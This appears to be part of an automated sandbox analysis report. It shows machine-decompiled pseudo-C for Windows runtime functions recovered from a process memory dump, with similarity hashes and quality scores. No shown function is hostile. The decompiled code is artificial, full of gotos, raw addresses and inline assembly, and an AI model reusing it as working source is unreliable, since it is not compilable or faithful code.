                                                    				signed int _t80;
                                                    				signed int* _t84;
                                                    
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t56 = __edx;
                                                    				_t84 = __ecx;
                                                    				_t80 = E04C0FD4E(__ecx, __edx);
                                                    				_v12 = _t80;
                                                    				if(_t80 != 0) {
                                                    					_t29 =  *__ecx & _t80;
                                                    					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                                    					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                                    						E04C10A13(__ecx, _t80, 0, _a4);
                                                    						_t80 = 1;
                                                    						if(E04B67D50() == 0) {
                                                    							_t32 = 0x7ffe0380;
                                                    						} else {
                                                    							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                    						}
                                                    						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                    							_push(3);
                                                    							L21:
                                                    							E04C01608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                                    						}
                                                    						goto L22;
                                                    					}
                                                    					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                                    						_t80 = E04C12B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                                    						if(_t80 != 0) {
                                                    							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                                    							_t77 = _v8;
                                                    							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                                    								E04C0C8F7(_t66, _t77, 0);
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t80 = E04C0DBD2(__ecx[0xb], _t74, __edx, _a4);
                                                    					}
                                                    					if(E04B67D50() == 0) {
                                                    						_t43 = 0x7ffe0380;
                                                    					} else {
                                                    						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                    					}
                                                    					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                                    						goto L22;
                                                    					} else {
                                                    						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                                    						goto L21;
                                                    					}
                                                    				} else {
                                                    					_push(__ecx);
                                                    					_push(_t80);
                                                    					E04C0A80D(__ecx[0xf], 9, __edx, _t80);
                                                    					L22:
                                                    					return _t80;
                                                    				}
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction ID: a7ee45b4b5c4a93cd9098b16856100c1ff06c583909f5f1da6a81b6f18f5e581
                                                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction Fuzzy Hash: 40310532300640AFE3328B69C844F6AB7EBEB85744F18C55DE5468B3C1DAB4F981D710
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 69%
                                                    			E04BC69A6(signed short* __ecx, void* __eflags) {
                                                    				signed int _v8;
                                                    				signed int _v16;
                                                    				intOrPtr _v20;
                                                    				signed int _v24;
                                                    				signed short _v28;
                                                    				signed int _v32;
                                                    				intOrPtr _v36;
                                                    				signed int _v40;
                                                    				char* _v44;
                                                    				signed int _v48;
                                                    				intOrPtr _v52;
                                                    				signed int _v56;
                                                    				char _v60;
                                                    				signed int _v64;
                                                    				char _v68;
                                                    				char _v72;
                                                    				signed short* _v76;
                                                    				signed int _v80;
                                                    				char _v84;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t68;
                                                    				intOrPtr _t73;
                                                    				signed short* _t74;
                                                    				void* _t77;
                                                    				void* _t78;
                                                    				signed int _t79;
                                                    				signed int _t80;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t80;
                                                    				_t75 = 0x100;
                                                    				_v64 = _v64 & 0x00000000;
                                                    				_v76 = __ecx;
                                                    				_t79 = 0;
                                                    				_t68 = 0;
                                                    				_v72 = 1;
                                                    				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                    				_t77 = 0;
                                                    				if(L04B56C59(__ecx[2], 0x100, __eflags) != 0) {
                                                    					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                    					if(_t79 != 0 && E04BC6BA3() != 0) {
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(0x1f0003);
                                                    						_push( &_v64);
                                                    						if(E04B89980() >= 0) {
                                                    							E04B62280(_t56, 0x4c38778);
                                                    							_t77 = 1;
                                                    							_t68 = 1;
                                                    							if( *0x4c38774 == 0) {
                                                    								asm("cdq");
                                                    								 *(_t79 + 0xf70) = _v64;
                                                    								 *(_t79 + 0xf74) = 0x100;
                                                    								_t75 = 0;
                                                    								_t73 = 4;
                                                    								_v60 =  &_v68;
                                                    								_v52 = _t73;
                                                    								_v36 = _t73;
                                                    								_t74 = _v76;
                                                    								_v44 =  &_v72;
                                                    								 *0x4c38774 = 1;
                                                    								_v56 = 0;
                                                    								_v28 = _t74[2];
                                                    								_v48 = 0;
                                                    								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                    								_v40 = 0;
                                                    								_v32 = 0;
                                                    								_v24 = 0;
                                                    								_v16 = 0;
                                                    								if(E04B4B6F0(0x4b2c338, 0x4b2c288, 3,  &_v60) == 0) {
                                                    									_v80 = _v80 | 0xffffffff;
                                                    									_push( &_v84);
                                                    									_push(0);
                                                    									_push(_v64);
                                                    									_v84 = 0xfa0a1f00;
                                                    									E04B89520();
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				if(_v64 != 0) {
                                                    					_push(_v64);
                                                    					E04B895D0();
                                                    					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                    					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                    				}
                                                    				if(_t77 != 0) {
                                                    					E04B5FFB0(_t68, _t77, 0x4c38778);
                                                    				}
                                                    				_pop(_t78);
                                                    				return E04B8B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                    			}

































                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e8ea3ba845a9c9699450cb9e0a922160329034c6057639d7eb4fe1efa7df002
                                                    • Instruction ID: 924b162f46cba45f5befaf9f6f502042cbc25039639fc14d6a4670260d281207
                                                    • Opcode Fuzzy Hash: 1e8ea3ba845a9c9699450cb9e0a922160329034c6057639d7eb4fe1efa7df002
                                                    • Instruction Fuzzy Hash: 86416AB1D00208AFDB14DFA5D980BFEBBF4EF48714F0481AAF955A7250EB75A906CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E04B45210(intOrPtr _a4, void* _a8) {
                                                    				void* __ecx;
                                                    				intOrPtr _t31;
                                                    				signed int _t32;
                                                    				signed int _t33;
                                                    				intOrPtr _t35;
                                                    				signed int _t52;
                                                    				void* _t54;
                                                    				void* _t56;
                                                    				unsigned int _t59;
                                                    				signed int _t60;
                                                    				void* _t61;
                                                    
                                                    				_t61 = E04B452A5(1);
                                                    				if(_t61 == 0) {
                                                    					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                    					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                    					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                    				} else {
                                                    					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                    					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                    				}
                                                    				_t60 = _t59 >> 1;
                                                    				_t32 = 0x3a;
                                                    				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                    					_t52 = _t60 + _t60;
                                                    					if(_a4 > _t52) {
                                                    						goto L5;
                                                    					}
                                                    					if(_t61 != 0) {
                                                    						asm("lock xadd [esi], eax");
                                                    						if((_t32 | 0xffffffff) == 0) {
                                                    							_push( *((intOrPtr*)(_t61 + 4)));
                                                    							E04B895D0();
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                    						}
                                                    					} else {
                                                    						E04B5EB70(_t54, 0x4c379a0);
                                                    					}
                                                    					_t26 = _t52 + 2; // 0xddeeddf0
                                                    					return _t26;
                                                    				} else {
                                                    					_t52 = _t60 + _t60;
                                                    					if(_a4 < _t52) {
                                                    						if(_t61 != 0) {
                                                    							asm("lock xadd [esi], eax");
                                                    							if((_t32 | 0xffffffff) == 0) {
                                                    								_push( *((intOrPtr*)(_t61 + 4)));
                                                    								E04B895D0();
                                                    								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                    							}
                                                    						} else {
                                                    							E04B5EB70(_t54, 0x4c379a0);
                                                    						}
                                                    						return _t52;
                                                    					}
                                                    					L5:
                                                    					_t33 = E04B8F3E0(_a8, _t54, _t52);
                                                    					if(_t61 == 0) {
                                                    						E04B5EB70(_t54, 0x4c379a0);
                                                    					} else {
                                                    						asm("lock xadd [esi], eax");
                                                    						if((_t33 | 0xffffffff) == 0) {
                                                    							_push( *((intOrPtr*)(_t61 + 4)));
                                                    							E04B895D0();
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                    						}
                                                    					}
                                                    					_t35 = _a8;
                                                    					if(_t60 <= 1) {
                                                    						L9:
                                                    						_t60 = _t60 - 1;
                                                    						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                    						goto L10;
                                                    					} else {
                                                    						_t56 = 0x3a;
                                                    						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                    							 *((short*)(_t52 + _t35)) = 0;
                                                    							L10:
                                                    							return _t60 + _t60;
                                                    						}
                                                    						goto L9;
                                                    					}
                                                    				}
                                                    			}















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e512e7ca8790f26dc5ea967024a03b61d347990c31c1e850b15dee52c9a7668
                                                    • Instruction ID: e4814d7131e11b85c1b5d8863943788bffdc18371dd0563bb31aff42d6125a84
                                                    • Opcode Fuzzy Hash: 4e512e7ca8790f26dc5ea967024a03b61d347990c31c1e850b15dee52c9a7668
                                                    • Instruction Fuzzy Hash: A7314A32245B04EBCB31BF14C880B7A7765FF40764F1146AAE8560B9A0EB70F910E690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B83D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				signed short** _t33;
                                                    				short* _t38;
                                                    				intOrPtr* _t39;
                                                    				intOrPtr* _t41;
                                                    				signed short _t43;
                                                    				intOrPtr* _t47;
                                                    				intOrPtr* _t53;
                                                    				signed short _t57;
                                                    				intOrPtr _t58;
                                                    				signed short _t60;
                                                    				signed short* _t61;
                                                    
                                                    				_t47 = __ecx;
                                                    				_t61 = __edx;
                                                    				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                    				if(_t60 > 0xfffe) {
                                                    					L22:
                                                    					return 0xc0000106;
                                                    				}
                                                    				if(__edx != 0) {
                                                    					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                    						L5:
                                                    						E04B57B60(0, _t61, 0x4b211c4);
                                                    						_v12 =  *_t47;
                                                    						_v12 = _v12 + 0xfff8;
                                                    						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                    						E04B57B60(0xfff8, _t61,  &_v12);
                                                    						_t33 = _a8;
                                                    						if(_t33 != 0) {
                                                    							 *_t33 = _t61;
                                                    						}
                                                    						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                    						_t53 = _a12;
                                                    						if(_t53 != 0) {
                                                    							_t57 = _t61[2];
                                                    							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                    							while(_t38 >= _t57) {
                                                    								if( *_t38 == 0x5c) {
                                                    									_t41 = _t38 + 2;
                                                    									if(_t41 == 0) {
                                                    										break;
                                                    									}
                                                    									_t58 = 0;
                                                    									if( *_t41 == 0) {
                                                    										L19:
                                                    										 *_t53 = _t58;
                                                    										goto L7;
                                                    									}
                                                    									 *_t53 = _t41;
                                                    									goto L7;
                                                    								}
                                                    								_t38 = _t38 - 2;
                                                    							}
                                                    							_t58 = 0;
                                                    							goto L19;
                                                    						} else {
                                                    							L7:
                                                    							_t39 = _a16;
                                                    							if(_t39 != 0) {
                                                    								 *_t39 = 0;
                                                    								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                    								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                    								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                    							}
                                                    							return 0;
                                                    						}
                                                    					}
                                                    					_t61 = _a4;
                                                    					if(_t61 != 0) {
                                                    						L3:
                                                    						_t43 = L04B64620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                    						_t61[2] = _t43;
                                                    						if(_t43 == 0) {
                                                    							return 0xc0000017;
                                                    						}
                                                    						_t61[1] = _t60;
                                                    						 *_t61 = 0;
                                                    						goto L5;
                                                    					}
                                                    					goto L22;
                                                    				}
                                                    				_t61 = _a4;
                                                    				if(_t61 == 0) {
                                                    					return 0xc000000d;
                                                    				}
                                                    				goto L3;
                                                    			}

















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 7915177f34729811a68378ceb9207e9ed3cfd0fd71484182c78996affa513b0d
                                                    • Instruction ID: fd850b4c4139bec4ecd7d5a60d9e4b268557ea81bbb678df2693c1b887c0c16a
                                                    • Opcode Fuzzy Hash: 7915177f34729811a68378ceb9207e9ed3cfd0fd71484182c78996affa513b0d
                                                    • Instruction Fuzzy Hash: F631B031701615DBC7259F2AD841A7BBBE5EF55B00B0594EEEC45CB360E772E840E7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 78%
                                                    			E04B7A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t39;
                                                    				intOrPtr _t45;
                                                    				intOrPtr* _t51;
                                                    				intOrPtr* _t52;
                                                    				intOrPtr* _t55;
                                                    				signed int _t57;
                                                    				intOrPtr* _t59;
                                                    				intOrPtr _t68;
                                                    				intOrPtr* _t77;
                                                    				void* _t79;
                                                    				signed int _t80;
                                                    				intOrPtr _t81;
                                                    				char* _t82;
                                                    				void* _t83;
                                                    
                                                    				_push(0x24);
                                                    				_push(0x4c20220);
                                                    				E04B9D08C(__ebx, __edi, __esi);
                                                    				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                    				_t79 = __ecx;
                                                    				_t35 =  *0x4c37b9c; // 0x0
                                                    				_t55 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                    				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                    				if(_t55 == 0) {
                                                    					_t39 = 0xc0000017;
                                                    					L11:
                                                    					return E04B9D0D1(_t39);
                                                    				}
                                                    				_t68 = 0;
                                                    				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                    				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                    				_t7 = _t55 + 8; // 0x8
                                                    				_t57 = 6;
                                                    				memcpy(_t7, _t79, _t57 << 2);
                                                    				_t80 = 0xfffffffe;
                                                    				 *(_t83 - 4) = _t80;
                                                    				if(0 < 0) {
                                                    					L14:
                                                    					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                    					L20:
                                                    					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                    					_t39 = _t81;
                                                    					goto L11;
                                                    				}
                                                    				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                    					_t81 = 0xc000007b;
                                                    					goto L20;
                                                    				}
                                                    				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                    					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                    					_t45 =  *_t59;
                                                    					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                    					 *_t59 = _t45 + 1;
                                                    					L6:
                                                    					 *(_t83 - 4) = 1;
                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                    					 *(_t83 - 4) = _t80;
                                                    					if(_t68 < 0) {
                                                    						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                    						if(_t82 == 0) {
                                                    							goto L14;
                                                    						}
                                                    						asm("btr eax, ecx");
                                                    						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                    						if( *_t82 != 0) {
                                                    							 *0x4c37b10 =  *0x4c37b10 - 8;
                                                    						}
                                                    						goto L20;
                                                    					}
                                                    					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                    					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                    					_t51 =  *0x4c3536c; // 0xca0d00
                                                    					if( *_t51 != 0x4c35368) {
                                                    						_push(3);
                                                    						asm("int 0x29");
                                                    						goto L14;
                                                    					}
                                                    					 *_t55 = 0x4c35368;
                                                    					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                    					 *_t51 = _t55;
                                                    					 *0x4c3536c = _t55;
                                                    					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                    					if(_t52 != 0) {
                                                    						 *_t52 = _t55;
                                                    					}
                                                    					_t39 = 0;
                                                    					goto L11;
                                                    				}
                                                    				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                    				_t68 = E04B7A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                    				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                    				if(_t68 < 0) {
                                                    					goto L14;
                                                    				}
                                                    				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                    				goto L6;
                                                    			}



















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 8858e0cd2d74cecc9c4ff00b95f6bb282cbd2372133122c1a7e51e66e48eeb07
                                                    • Instruction ID: eef308e43f232325f7f0ddc61c6f2259058af860c4e068045f008f44e82d0df3
                                                    • Opcode Fuzzy Hash: 8858e0cd2d74cecc9c4ff00b95f6bb282cbd2372133122c1a7e51e66e48eeb07
                                                    • Instruction Fuzzy Hash: 6E4145B5A00209DFDB54CF68D890BAEBBF2FB49314F1580A9E914AB344D778BD01CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E04BC7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                    				signed int _v8;
                                                    				char _v588;
                                                    				intOrPtr _v592;
                                                    				intOrPtr _v596;
                                                    				signed short* _v600;
                                                    				char _v604;
                                                    				short _v606;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed short* _t55;
                                                    				void* _t56;
                                                    				signed short* _t58;
                                                    				signed char* _t61;
                                                    				char* _t68;
                                                    				void* _t69;
                                                    				void* _t71;
                                                    				void* _t72;
                                                    				signed int _t75;
                                                    
                                                    				_t64 = __edx;
                                                    				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                    				_v8 =  *0x4c3d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                    				_t55 = _a16;
                                                    				_v606 = __ecx;
                                                    				_t71 = 0;
                                                    				_t58 = _a12;
                                                    				_v596 = __edx;
                                                    				_v600 = _t58;
                                                    				_t68 =  &_v588;
                                                    				if(_t58 != 0) {
                                                    					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                    					if(_t55 != 0) {
                                                    						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                    					}
                                                    				}
                                                    				_t8 = _t71 + 0x2a; // 0x28
                                                    				_t33 = _t8;
                                                    				_v592 = _t8;
                                                    				if(_t71 <= 0x214) {
                                                    					L6:
                                                    					 *((short*)(_t68 + 6)) = _v606;
                                                    					if(_t64 != 0xffffffff) {
                                                    						asm("cdq");
                                                    						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                    						 *((char*)(_t68 + 0x28)) = _a4;
                                                    						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                    						 *((char*)(_t68 + 0x29)) = _a8;
                                                    						if(_t71 != 0) {
                                                    							_t22 = _t68 + 0x2a; // 0x2a
                                                    							_t64 = _t22;
                                                    							E04BC6B4C(_t58, _t22, _t71,  &_v604);
                                                    							if(_t55 != 0) {
                                                    								_t25 = _v604 + 0x2a; // 0x2a
                                                    								_t64 = _t25 + _t68;
                                                    								E04BC6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                    							}
                                                    							if(E04B67D50() == 0) {
                                                    								_t61 = 0x7ffe0384;
                                                    							} else {
                                                    								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                    							}
                                                    							_push(_t68);
                                                    							_push(_v592 + 0xffffffe0);
                                                    							_push(0x402);
                                                    							_push( *_t61 & 0x000000ff);
                                                    							E04B89AE0();
                                                    						}
                                                    					}
                                                    					_t35 =  &_v588;
                                                    					if( &_v588 != _t68) {
                                                    						_t35 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                    					}
                                                    					L16:
                                                    					_pop(_t69);
                                                    					_pop(_t72);
                                                    					_pop(_t56);
                                                    					return E04B8B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                    				}
                                                    				_t68 = L04B64620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                    				if(_t68 == 0) {
                                                    					goto L16;
                                                    				} else {
                                                    					_t58 = _v600;
                                                    					_t64 = _v596;
                                                    					goto L6;
                                                    				}
                                                    			}























                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 59ec3b52da989e1d9cd69b97358587f33ee11e8bc0a05aa9a7261c872539d557
                                                    • Instruction ID: 5e62536eee4a53ff0f074914387b58ae1b367cec755786b329695d9f8fc9fbb1
                                                    • Opcode Fuzzy Hash: 59ec3b52da989e1d9cd69b97358587f33ee11e8bc0a05aa9a7261c872539d557
                                                    • Instruction Fuzzy Hash: FC31A2726047529BC320DF68C981A6AB7E9FF88700F044A6DF89587690EB34F914CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E04B6C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                    				signed int* _v8;
                                                    				char _v16;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				signed char _t33;
                                                    				signed char _t43;
                                                    				signed char _t48;
                                                    				signed char _t62;
                                                    				void* _t63;
                                                    				intOrPtr _t69;
                                                    				intOrPtr _t71;
                                                    				unsigned int* _t82;
                                                    				void* _t83;
                                                    
                                                    				_t80 = __ecx;
                                                    				_t82 = __edx;
                                                    				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                    				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                    				if((_t33 & 0x00000001) != 0) {
                                                    					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                    					if(E04B67D50() != 0) {
                                                    						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    					} else {
                                                    						_t43 = 0x7ffe0386;
                                                    					}
                                                    					if( *_t43 != 0) {
                                                    						_t43 = E04C18D34(_v8, _t80);
                                                    					}
                                                    					E04B62280(_t43, _t82);
                                                    					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                    						E04B5FFB0(_t62, _t80, _t82);
                                                    						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                    						_t30 = _t80 + 0xd0; // 0xd0
                                                    						_t83 = _t30;
                                                    						E04C18833(_t83,  &_v16);
                                                    						_t81 = _t80 + 0x90;
                                                    						E04B5FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                    						_t63 = 0;
                                                    						_push(0);
                                                    						_push(_t83);
                                                    						_t48 = E04B8B180();
                                                    						if(_a4 != 0) {
                                                    							E04B62280(_t48, _t81);
                                                    						}
                                                    					} else {
                                                    						_t69 = _v8;
                                                    						_t12 = _t80 + 0x98; // 0x98
                                                    						_t13 = _t69 + 0xc; // 0x575651ff
                                                    						E04B6BB2D(_t13, _t12);
                                                    						_t71 = _v8;
                                                    						_t15 = _t80 + 0xb0; // 0xb0
                                                    						_t16 = _t71 + 8; // 0x8b000cc2
                                                    						E04B6BB2D(_t16, _t15);
                                                    						E04B6B944(_v8, _t62);
                                                    						 *((char*)(_t80 + 0xdc)) = 0;
                                                    						E04B5FFB0(0, _t80, _t82);
                                                    						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                    						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                    						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                    						 *(_t80 + 0xde) = 0;
                                                    						if(_a4 == 0) {
                                                    							_t25 = _t80 + 0x90; // 0x90
                                                    							E04B5FFB0(0, _t80, _t25);
                                                    						}
                                                    						_t63 = 1;
                                                    					}
                                                    					return _t63;
                                                    				}
                                                    				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                    				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                    				if(_a4 == 0) {
                                                    					_t24 = _t80 + 0x90; // 0x90
                                                    					E04B5FFB0(0, __ecx, _t24);
                                                    				}
                                                    				return 0;
                                                    			}

















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction ID: e6f6dd33c5f7013cc1e6eef37941bb9dbfd42482c65eec31f434ec1bfa8ad2da
                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction Fuzzy Hash: E1311671705646AAEB04EBB4C480BF9FB64FF52248F0441DAD95987241DB3C7A19EBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 92%
                                                    			E04B7A70E(intOrPtr* __ecx, char* __edx) {
                                                    				unsigned int _v8;
                                                    				intOrPtr* _v12;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t16;
                                                    				intOrPtr _t17;
                                                    				intOrPtr _t28;
                                                    				char* _t33;
                                                    				intOrPtr _t37;
                                                    				intOrPtr _t38;
                                                    				void* _t50;
                                                    				intOrPtr _t52;
                                                    
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t52 =  *0x4c37b10; // 0x10
                                                    				_t33 = __edx;
                                                    				_t48 = __ecx;
                                                    				_v12 = __ecx;
                                                    				if(_t52 == 0) {
                                                    					 *0x4c37b10 = 8;
                                                    					 *0x4c37b14 = 0x4c37b0c;
                                                    					 *0x4c37b18 = 1;
                                                    					L6:
                                                    					_t2 = _t52 + 1; // 0x11
                                                    					E04B7A990(0x4c37b10, _t2, 7);
                                                    					asm("bts ecx, eax");
